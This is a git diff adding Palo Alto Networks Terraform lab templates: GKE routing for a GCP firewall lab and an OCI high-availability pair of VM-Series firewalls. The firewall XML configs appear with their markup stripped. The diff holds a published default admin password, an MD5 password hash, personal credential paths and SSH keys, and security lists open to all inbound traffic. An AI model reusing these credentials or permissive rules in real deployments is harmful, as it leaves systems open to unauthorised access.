+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node2" {
+ name = "gke-node2"
+ dest_range = "10.16.2.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["web-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node3" {
+ name = "gke-node3"
+ dest_range = "10.16.3.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["web-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+output "pan-tf-name" {
+ value = "${google_compute_instance.firewall.*.name}"
+}
+
+output "k8s-cluster-name" {
+ value = "${google_container_cluster.cluster.*.name}"
+}
+
+output "k8s-cluster-endpoint" {
+ value = "${google_container_cluster.cluster.*.endpoint}"
+}
+
+output "k8s-cluster_ipv4_cidr" {
+ value = "${google_container_cluster.cluster.*.cluster_ipv4_cidr}"
+}
diff --git a/gcp/k8s-Prisma-API/README.md b/gcp/k8s-Prisma-API/README.md
new file mode 100644
index 00000000..ccfbe6c9
--- /dev/null
+++ b/gcp/k8s-Prisma-API/README.md
@@ -0,0 +1,2 @@
+# k8s-terraform-skillet
+This Repository Holds the Terraform template in a PANW Skillet format to deploy a GKE K8s cluster that supports E/W inspection.
diff --git a/gcp/k8s-Prisma-API/Variables.tf b/gcp/k8s-Prisma-API/Variables.tf
new file mode 100644
index 00000000..fdb1944c
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Variables.tf
@@ -0,0 +1,72 @@
+// PROJECT Variables
+variable "container-ver" {
+ default = "1.11.8-gke.6"
+}
+
+variable "my_gcp_project" {
+ default = "djs-gcp-2018"
+}
+
+variable "region" {
+ default = "us-central1"
+}
+
+variable "zone" {
+ default = "us-central1-a"
+}
+
+variable "credentials_file_path" {
+ description = "Path to the JSON file used to describe your account credentials"
+ default = "/Users/dspears/GCP/k8-test/djs-gcp-2018-creds.json"
+}
+
+variable "gce_ssh_user" {
+ description = " ssh user that is used in the public key"
+ default = "dspears@SJCMAC3024G8WL"
+}
+
+variable "gce_ssh_pub_key" {
+ description = " ssh key in the format: ssh-rsa username "
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bjwWN/LY87FOZH/uuRXS5ku3OXkxsFIvecXMNDoeTNZU5QSM3bAV8t/IU52GsdQO+f2hv9iVulMfYPwxsMcVen32q+t6dcgtChUXPSk+giGqf71iR2xiqGdk6GgC705SUXG/AX1whNI1qT84wP0nOrJaoGo/SZq4Ryel9mptu1Ifj1vMphyw2WOFOMB3IuUYckZHgwbQxZK4iCGJSZmzP+M03oSKZATwvuI1XXUIUVTCcV45NofgCW3Ocfk0UjhK01l1SO3H4+c+v40Zufpqo4vPMOQajTggygpJ7SRCgOYWJxcdx4cr9ASNteii5LQFqAixJD0+0izXfQEUm0/T dspears@SJCMAC3024G8WL"
+}
+
+//The rest of the variables do not need to be modified for the K8s Lab
+// VM-Series Firewall Variables
+
+variable "firewall_name" {
+ default = "firewall"
+}
+
+variable "image_fw" {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-810"
+
+ //default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
+}
+
+variable "machine_type_fw" {
+ default = "n1-standard-4"
+}
+
+variable "bootstrap_bucket_fw" {
+ default = "k8-ew"
+}
+
+variable "interface_0_name" {
+ default = "management"
+}
+
+variable "interface_1_name" {
+ default = "untrust"
+}
+
+variable "interface_2_name" {
+ default = "trust"
+}
+
+variable "scopes_fw" {
+ default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
diff --git a/oci/HA/OCI HA deployment guide.pdf b/oci/HA/OCI HA deployment guide.pdf
new file mode 100644
index 00000000..d41da875
Binary files /dev/null and b/oci/HA/OCI HA deployment guide.pdf differ
diff --git a/oci/HA/OCI-HA.png b/oci/HA/OCI-HA.png
new file mode 100644
index 00000000..128459fc
Binary files /dev/null and b/oci/HA/OCI-HA.png differ
diff --git a/oci/HA/README.md b/oci/HA/README.md
new file mode 100644
index 00000000..3928a15c
--- /dev/null
+++ b/oci/HA/README.md
@@ -0,0 +1,32 @@
+# Sample HA deployment for OCI
+
+Terraform creates:
+- A single compartment to house all infrastructure
+- A VCN with 5 regional subnets (management, untrust, trust, ha2, web)
+- 2 VM-Series firewalls in separate Availability Domains (ADs)
+- A test server
+- OCI Dynamic Groups and Policies for secondary IP address management
+
+HA in OCI works by moving secondary IP addresses from the down FW to the newly-active one. This is accomplished by the VM-Series plugin avilable beginning with PANOS 9.1.1 in OCI.
+
+
+
+
+
+
+Prior to deployment, update terraform.tfvars with the following information:
+- tenancy_ocid - The OCID of the target tenancy
+- user_ocid - The OCID of the user deploying the infrastructure
+- fingerprint - The fingerprint associated with the user's API key
+- private_key_path - The absolute path to the PEM-formatted private SSH key for the user
+- parent_compartment_ocid - The OCID of the parent/root compartment
+- ssh_authorized_key - The public SSH key for the user (format = "ssh-rsa ")
+- fw_mgmt_src_ip - The IP or subnet authorized to connect to the FW post-deployment
+
+By default, the deployment is into us-ashburn-1. This may be altered by changing the relevant variables in terraform.tfvars.
+
+The folder fw-configs contains sample configuration files for the FW. These configuration files have HA pre-configured, allow SSH access to the server, and permit all outbound access to the internet. The username is 'admin' and the password is 'Pal0Alt0@123', which should be changed immediately.
+
+## Support Policy
+These files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/oci/HA/compartment.tf b/oci/HA/compartment.tf
new file mode 100644
index 00000000..0b053323
--- /dev/null
+++ b/oci/HA/compartment.tf
@@ -0,0 +1,6 @@
+resource "oci_identity_compartment" "compartment" {
+ compartment_id = "${var.parent_compartment_ocid}"
+ name = "${var.compartment_name}"
+ description = "compartment created by terraform"
+ enable_delete = true
+}
\ No newline at end of file
diff --git a/oci/HA/firewalls.tf b/oci/HA/firewalls.tf
new file mode 100644
index 00000000..2496016e
--- /dev/null
+++ b/oci/HA/firewalls.tf
@@ -0,0 +1,60 @@
+resource "oci_core_instance" "firewall1" {
+ availability_domain = "${var.fw1_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "FW-A"
+ shape = "${var.fw_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.management.id}"
+ private_ip = "${var.fw1_management_ip}"
+ display_name = "management"
+ assign_public_ip = true
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.management.id}"]
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.fw_ocid}"
+ boot_volume_size_in_gbs = "60"
+ }
+ preserve_boot_volume = false
+
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+# user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
+resource "oci_core_instance" "firewall2" {
+ availability_domain = "${var.fw2_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "FW-B"
+ shape = "${var.fw_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.management.id}"
+ private_ip = "${var.fw2_management_ip}"
+ display_name = "management"
+ assign_public_ip = true
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.management.id}"]
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.fw_ocid}"
+ boot_volume_size_in_gbs = "60"
+ }
+ preserve_boot_volume = false
+
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+# user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/fw-configs/HA-FWA.xml b/oci/HA/fw-configs/HA-FWA.xml
new file mode 100644
index 00000000..ae6c5c2d
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWA.xml
@@ -0,0 +1,623 @@
+
+
+
+
+
+ $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+
+ no
+
+
+
+
+
+
+ no
+
+
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 192.168.101.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ FWA
+ 192.168.0.11
+ 255.255.255.0
+ 192.168.0.1
+
+
+ 169.254.169.254
+ 8.8.8.8
+
+
+
+
+ us.pool.ntp.org
+
+
+
+
+
+ pool.ntp.org
+
+
+
+
+
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+ yes
+ no
+ no
+ no
+
+
+
+
+ yes
+
+
+
+
+ management
+
+
+
+ ethernet1/3
+ 192.168.30.101
+ 255.255.255.0
+ 192.168.30.1
+
+
+
+ 1
+ 192.168.0.12
+
+ ip
+
+
+ 101
+
+
+
+
+
+
+ auto
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ web1
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ any
+ any
+
+
+
+
+
+ fw-untrust
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+ 192.168.101.2
+
+
+ 192.168.1.100
+
+
+
+
+
+
+
diff --git a/oci/HA/fw-configs/HA-FWB.xml b/oci/HA/fw-configs/HA-FWB.xml
new file mode 100644
index 00000000..6b5d41ce
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWB.xml
@@ -0,0 +1,623 @@
+
+
+
+
+
+ $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+
+ no
+
+
+
+
+
+
+ no
+
+
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 192.168.101.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ FWB
+ 192.168.0.12
+ 255.255.255.0
+ 192.168.0.1
+
+
+ 169.254.169.254
+ 8.8.8.8
+
+
+
+
+ us.pool.ntp.org
+
+
+
+
+
+ pool.ntp.org
+
+
+
+
+
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+ yes
+ no
+ no
+ no
+
+
+
+
+ yes
+
+
+
+
+ management
+
+
+
+ ethernet1/3
+ 192.168.30.102
+ 255.255.255.0
+ 192.168.30.1
+
+
+
+ 1
+ 192.168.0.11
+
+ ip
+
+
+ 102
+
+
+
+
+
+
+ auto
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ web1
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ any
+ any
+
+
+
+
+
+ fw-untrust
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+ 192.168.101.2
+
+
+ 192.168.1.100
+
+
+
+
+
+
+
diff --git a/oci/HA/identity_policy.tf b/oci/HA/identity_policy.tf
new file mode 100644
index 00000000..c2d601b7
--- /dev/null
+++ b/oci/HA/identity_policy.tf
@@ -0,0 +1,14 @@
+resource "oci_identity_dynamic_group" "ha" {
+ compartment_id = "${var.tenancy_ocid}"
+ name = "HA"
+ description = "dynamic group created by terraform"
+ matching_rule = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}"
+}
+resource "oci_identity_policy" "ha" {
+ name = "HA"
+ description = "dynamic policy created by terraform"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}",
+ "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}",
+ ]
+}
\ No newline at end of file
diff --git a/oci/HA/internet_gateway.tf b/oci/HA/internet_gateway.tf
new file mode 100644
index 00000000..27439e7d
--- /dev/null
+++ b/oci/HA/internet_gateway.tf
@@ -0,0 +1,6 @@
+resource "oci_core_internet_gateway" "internet_gateway" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "IG-PANW"
+ enabled = true
+}
\ No newline at end of file
diff --git a/oci/HA/providers.tf b/oci/HA/providers.tf
new file mode 100644
index 00000000..27515797
--- /dev/null
+++ b/oci/HA/providers.tf
@@ -0,0 +1,11 @@
+#terraform {
+# required_version = ">= 0.12"
+#}
+
+provider "oci" {
+ tenancy_ocid = "${var.tenancy_ocid}"
+ user_ocid = "${var.user_ocid}"
+ fingerprint = "${var.fingerprint}"
+ private_key_path = "${var.private_key_path}"
+ region = "${var.region}"
+}
\ No newline at end of file
diff --git a/oci/HA/route_tables.tf b/oci/HA/route_tables.tf
new file mode 100644
index 00000000..2e086160
--- /dev/null
+++ b/oci/HA/route_tables.tf
@@ -0,0 +1,24 @@
+resource "oci_core_route_table" "public" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "RT-Public"
+
+ route_rules {
+ description = "default"
+ destination = "0.0.0.0/0"
+ destination_type = "CIDR_BLOCK"
+ network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}"
+ }
+}
+resource "oci_core_route_table" "web" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "RT-Web"
+
+ route_rules {
+ description = "default"
+ destination = "0.0.0.0/0"
+ destination_type = "CIDR_BLOCK"
+ network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/secondary_ips.tf b/oci/HA/secondary_ips.tf
new file mode 100644
index 00000000..289254e3
--- /dev/null
+++ b/oci/HA/secondary_ips.tf
@@ -0,0 +1,17 @@
+// The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover.
+resource "oci_core_private_ip" "firewall_untrust_secondary_private" {
+ vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}"
+ display_name = "firewall_untrust_secondary_private"
+ ip_address = "${var.untrust_floating_ip}"
+}
+resource "oci_core_private_ip" "firewall_trust_secondary_private" {
+ vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}"
+ display_name = "firewall_trust_secondary_private"
+ ip_address = "${var.trust_floating_ip}"
+}
+resource "oci_core_public_ip" "firewall_untrust_secondary_public" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ lifetime = "RESERVED"
+ display_name = "firewall_untrust_secondary_public"
+ private_ip_id = "${oci_core_private_ip.firewall_untrust_secondary_private.id}"
+}
\ No newline at end of file
diff --git a/oci/HA/security_lists.tf b/oci/HA/security_lists.tf
new file mode 100644
index 00000000..bfa97d25
--- /dev/null
+++ b/oci/HA/security_lists.tf
@@ -0,0 +1,78 @@
+resource "oci_core_security_list" "management" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-mgmt"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "6"
+ source = "${var.fw_mgmt_src_ip}"
+ stateless = false
+ tcp_options {
+ min = 22
+ max = 22
+ }
+ }
+ ingress_security_rules {
+ protocol = "6"
+ source = "${var.fw_mgmt_src_ip}"
+ stateless = false
+ tcp_options {
+ min = 443
+ max = 443
+ }
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "${var.management_cidr}"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "untrust" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-untrust"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "trust" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-trust"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "web" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-web"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/server.tf b/oci/HA/server.tf
new file mode 100644
index 00000000..9a64b4eb
--- /dev/null
+++ b/oci/HA/server.tf
@@ -0,0 +1,26 @@
+resource "oci_core_instance" "web1" {
+ availability_domain = "${var.server_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "web1"
+ shape = "${var.server_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.web.id}"
+ display_name = "web1"
+ private_ip = "${var.web1_ip}"
+ assign_public_ip = false
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.ubuntu_image_ocid[var.region]}"
+ boot_volume_size_in_gbs = "60"
+ }
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+ #user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/terraform.tfvars b/oci/HA/terraform.tfvars
new file mode 100644
index 00000000..61c5ee9f
--- /dev/null
+++ b/oci/HA/terraform.tfvars
@@ -0,0 +1,32 @@
+tenancy_ocid = ""
+fingerprint = ""
+private_key_path = "/root/.oci/oci_api_key.pem"
+parent_compartment_ocid = ""
+ssh_authorized_key = ""
+fw_mgmt_src_ip = ""
+region = "us-ashburn-1"
+fw1_availability_domain = "PFNB:US-ASHBURN-AD-1"
+fw2_availability_domain = "PFNB:US-ASHBURN-AD-2"
+server_availability_domain = "PFNB:US-ASHBURN-AD-1"
+compartment_name = "PANW-compartment"
+vcn_cidr = "192.168.0.0/16"
+management_cidr = "192.168.0.0/24"
+fw1_management_ip = "192.168.0.11"
+fw2_management_ip = "192.168.0.12"
+untrust_cidr = "192.168.1.0/24"
+fw1_untrust_ip = "192.168.1.101"
+fw2_untrust_ip = "192.168.1.102"
+untrust_floating_ip = "192.168.1.100"
+trust_cidr = "192.168.2.0/24"
+fw1_trust_ip = "192.168.2.101"
+fw2_trust_ip = "192.168.2.102"
+trust_floating_ip = "192.168.2.100"
+ha2_cidr = "192.168.30.0/24"
+fw1_ha2_ip = "192.168.30.101"
+fw2_ha2_ip = "192.168.30.102"
+web_cidr = "192.168.101.0/24"
+web1_ip = "192.168.101.2"
+fw_ocid = "ocid1.image.oc1..aaaaaaaapq6xrfl3j2qs5vjgeni7c7hyq6myg7uaqzdzxsk373qrxbzyv7aa"
+fw_shape_size = "VM.Standard2.4"
+server_shape_size = "VM.Standard2.1"
diff --git a/oci/HA/variables.tf b/oci/HA/variables.tf
new file mode 100644
index 00000000..36afaaca
--- /dev/null
+++ b/oci/HA/variables.tf
@@ -0,0 +1,120 @@
+variable "tenancy_ocid" {
+ description = "OCID of the tenant"
+}
+variable "user_ocid" {
+ description = "OCID of the user creating the infrastructure"
+}
+variable "fingerprint" {
+ description = "fingerprint of the API key used for authentication"
+}
+variable "private_key_path" {
+ description = "path to the private key used for authentication"
+}
+variable "region" {
+ description = "region where the compartment is located"
+}
+variable "parent_compartment_ocid" {
+ description = "OCID of the parent compartment"
+}
+variable "compartment_name" {
+ description = "name of the compartment to create"
+}
+variable "vcn_cidr" {
+ description = "cidr block to use for the vcn"
+}
+variable "fw_mgmt_src_ip" {
+ description = "source IP or CIDR allowed to manage the FW"
+}
+variable "fw_ocid" {
+ description = "OCID of the FW image to deploy"
+}
+variable "fw_shape_size" {
+ description = "shape size for the FW (VM.Standard2.4 minimum)"
+}
+variable "fw1_availability_domain" {
+ description = "availability domain into which FW1 will be deployed"
+}
+variable "fw2_availability_domain" {
+ description = "availability domain into which FW2 will be deployed"
+}
+variable "ssh_authorized_key" {
+ description = "public SSH key to install on the hosts"
+}
+variable "management_cidr" {
+ description = "CIDR block for the management subnet"
+}
+variable "fw1_management_ip" {
+ description = "IP address for the fw1 management interface"
+}
+variable "fw2_management_ip" {
+ description = "IP address for the fw2 management interface"
+}
+variable "untrust_cidr" {
+ description = "CIDR block for the untrust subnet"
+}
+variable "fw1_untrust_ip" {
+ description = "IP address for the fw1 untrust interface"
+}
+variable "fw2_untrust_ip" {
+ description = "IP address for the fw2 untrust interface"
+}
+variable "untrust_floating_ip" {
+ description = "floating IP address for the untrust interface"
+}
+variable "trust_cidr" {
+ description = "CIDR block for the trust subnet"
+}
+variable "fw1_trust_ip" {
+ description = "IP address for the fw1 trust interface"
+}
+variable "fw2_trust_ip" {
+ description = "IP address for the fw2 trust interface"
+}
+variable "trust_floating_ip" {
+ description = "floating IP address for the trust interface"
+}
+variable "ha2_cidr" {
+ description = "CIDR block for the ha2 subnet"
+}
+variable "fw1_ha2_ip" {
